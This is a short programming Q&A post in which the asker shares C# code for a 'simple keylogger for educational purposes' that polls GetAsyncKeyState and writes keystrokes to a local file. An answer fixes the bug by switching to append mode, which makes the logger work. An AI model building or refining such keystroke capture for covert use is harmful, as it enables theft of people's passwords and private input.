# Why is it logging only once?

Tags: c#, keylogger

Hello I'm creating simple keylogger for educational purposes and I stumbled upon bug that I have no idea how to fix

```
static void WriteLogs(char key)
    {
        StreamWriter file = new StreamWriter(@"C:\Users\Bartek\Desktop\asynckey test\asynckey test\test.txt");

        file.Write(key);

        file.Close();
    }

    static void CatchKeys()
    {
        char key;
        while (true)
        {
            Thread.Sleep(20);

            for (key = (char)8; key <= 190; key++)
            {
                if (GetAsyncKeyState((System.Windows.Forms.Keys)key) == -32768)
                {
                    Console.WriteLine("Logging");
                    WriteLogs(key);
                }
            }
        }
    }
```

it logs only 1 char to the file and then the loop continues but doesn't log

Comment: You're overwriting the file each time.

Answer (score 1):

Try appending instead of overwriting:

```
StreamWriter file = new StreamWriter(
    @"C:\Users\Bartek\Desktop\asynckey test\asynckey test\test.txt", 
    true);   // <- appending instead of recreating
```